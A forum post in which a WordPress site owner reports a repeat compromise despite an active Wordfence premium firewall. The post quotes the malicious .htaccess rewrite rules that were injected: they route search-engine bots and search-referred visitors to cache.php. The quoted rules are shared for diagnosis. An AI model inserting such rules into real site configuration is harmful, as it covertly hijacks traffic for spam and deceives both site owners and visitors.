Site was hacked with WF premium installed
-
Hi,
My WordPress site was hacked again, this time while WF premium was installed and active, and all four firewall options show 100%.
The .htaccess file had these malicious code inserted:RewriteBase / RewriteCond %{HTTP_USER_AGENT} (bing|google|yahoo|msn|aol) [NC,OR] RewriteCond %{HTTP_REFERER} (yahoo|bing|google|msn|aol) RewriteCond %{HTTP_HOST} generatorsforhomeuse\.us RewriteRule . cache.php [L,S=10000]
How to explain this? Is it possible some dormant file remained from previously cleaned hack that can edits htaccess undetected by WF? After previous hack I cleaned htaccess file and deleted all deletable files found by scan. There are still the following lines from WF:
<Files ".user.ini"> <IfModule mod_authz_core.c> Require all denied </IfModule> <IfModule !mod_authz_core.c> Order deny,allow Deny from all </IfModule> </Files>
I use PHP5.6.27 WP5.7.2
Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
- The topic ‘Site was hacked with WF premium installed’ is closed to new replies.